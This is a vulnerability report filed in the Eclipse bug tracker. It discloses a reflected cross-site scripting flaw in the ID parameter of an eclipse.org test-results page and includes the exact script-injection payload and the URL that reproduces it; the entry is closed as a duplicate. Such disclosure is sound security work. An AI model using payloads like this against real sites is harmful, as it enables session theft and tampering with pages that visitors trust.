Community
Participate
Working Groups
Created attachment 271643 [details] eclise screenshot Vulenrability Name : Cross site scripting Vulenrability Description : Vulenrable URL : http://www.eclipse.org/modeling/mdt/downloads/testResults.php? hl=1&ID=0.9.0/R200906190654&project=uml2tools&project=uml2tools Vulenrable Item : ID payload=0.9.0/R200906190654'"()%26%25<acx><ScRiPt >alert('hacked by vikash')</ScRiPt> How to reproduce this issue 1. visit this url it will alert a xss popup http://www.eclipse.org/modeling/mdt/downloads/testResults.php? hl=1&ID=0.9.0/R200906190654'"()%26%25<acx><ScRiPt >alert('hacked by vikash') </ScRiPt>&project=uml2tools&project=uml2tools POC : screenshot enclosed in attachement
*** This bug has been marked as a duplicate of bug 518274 ***